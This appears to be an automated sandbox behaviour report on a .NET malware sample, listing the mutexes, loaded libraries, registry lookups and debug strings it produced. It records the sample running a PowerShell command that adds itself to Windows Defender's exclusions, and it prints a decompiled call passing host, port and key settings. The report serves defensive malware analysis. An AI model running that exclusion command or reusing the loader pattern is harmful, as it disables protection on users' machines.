File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6552
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Mutant created: \Sessions\1\BaseNamedObjects\lsODhik7XANOkJAK

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqvi3wjx.qt2.ps1

Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000000.2075574675.0000000000232000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: INSERT INTO Product(Id, Name, Units, Price, CategoryId)VALUES (@id, @name, @units, @price, @idcat); SELECT last_insert_rowid()

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 1128
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbs source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: fSgG.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source:	Binary string: Accessibility.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: n.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb$ source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Xml.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Core.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: \??\C:\Windows\symbols\exe\fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.0000000006797000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp, WER7A57.tmp.dmp.13.dr
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb] source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\fSgG.pdbe source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Windows.Forms.pdb\|c source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.PDB source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbSK source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Drawing.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: mscorlib.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Management.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Source:	Binary string: symbols\dll\mscorlib.pdbLb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.ni.pdb source: WER7A57.tmp.dmp.13.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
